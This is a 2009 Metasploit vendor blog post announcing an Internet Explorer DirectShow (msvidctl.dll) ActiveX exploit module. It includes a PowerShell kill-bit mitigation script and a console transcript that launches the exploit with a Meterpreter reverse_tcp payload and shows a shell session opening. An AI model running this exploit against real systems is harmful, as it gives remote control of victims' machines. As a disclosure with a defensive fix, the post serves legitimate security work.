IE DirectShow (msvidctl.dll) MPEG-2 Metasploit Exploit

Blog Post created by rapid7-admin on Jul 7, 2009


There is a new IE exploit that has recently been released into the wild. The exploit targets DirectShow (msvidctl.dll) MPEG-2 handling. It uses an ActiveX control together with an included GIF file to trigger a memory corruption. The vulnerability affects users of both IE 6 and IE 7.


Today, the exploit was added to the Metasploit framework by HD Moore (the author of Metasploit). The module was written by Trancer and was originally posted at http://www.rec-sec.com/2009/07/06/ms-directshow-msvidctl-exploit/.


Thus far, I have verified the exploit to be working on IE 7. Since the exploit works by using an ActiveX control, the victim will need to allow the ActiveX control to run.
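Because the exploit depends on IE loading the vulnerable ActiveX control, the standard mitigation until a patch is applied is to set the control's "kill bit" so IE refuses to instantiate it at all. The PowerShell below is an added example (not from this post or the Metasploit module); the CLSID is a placeholder you must replace with the MSVidCtl class identifier from Microsoft's advisory for this issue.

```powershell
# Added example: set the ActiveX kill bit for a given CLSID so Internet
# Explorer will not load that control, even if the user would allow it.
# The CLSID passed in is a placeholder; use the real one from the vendor
# advisory. Must be run from an elevated (administrator) PowerShell.
param(
    [Parameter(Mandatory = $true)]
    [ValidatePattern('^\{[0-9A-Fa-f-]{36}\}$')]
    [string]$Clsid   # e.g. '{00000000-0000-0000-0000-000000000000}' (placeholder)
)

$KillBit = 0x400   # "Compatibility Flags" bit that disables a control in IE

# Both the native key and, on 64-bit Windows, the Wow6432Node key (used by
# 32-bit IE) need the flag; the second path simply does not exist on 32-bit.
$bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($base in $bases) {
    if (-not (Test-Path $base)) { continue }   # skip Wow6432Node on 32-bit hosts
    $key = Join-Path $base $Clsid

    if (-not (Test-Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already present on the control and OR in the kill bit.
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
        -Value ($current -bor $KillBit) -Type DWord

    # Read back and verify the bit actually landed.
    $check = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    if (($check -band $KillBit) -eq $KillBit) {
        Write-Output ("Kill bit set under {0} (Compatibility Flags = 0x{1:X})" -f $base, $check)
    } else {
        Write-Error "Failed to set kill bit under $base for $Clsid"
    }
}
```

Already-open IE windows keep the control loaded; the setting takes effect for new browser processes.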


=[ msf v3.3-dev
+ -- --=[ 384 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops

=[ 162 aux

msf > use windows/browser/msvidctl_mpeg2
msf exploit(msvidctl_mpeg2) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(msvidctl_mpeg2) > set LHOST
msf exploit(msvidctl_mpeg2) > set LPORT 443
LPORT => 443
msf exploit(msvidctl_mpeg2) > set URIPATH /test.html
URIPATH => /test.html
msf exploit(msvidctl_mpeg2) > set SRVPORT 9000
SRVPORT => 9000
msf exploit(msvidctl_mpeg2) > exploit
[*] Exploit running as background job.
msf exploit(msvidctl_mpeg2) >
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Using URL:
[*]  Local IP:
[*] Server started.
[*] Sending HTML to…
[*] Sending exploit to…
[*] Sending GIF to…
[*] Transmitting intermediate stager for over-sized stage…(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened ( ->


Happy Hacking!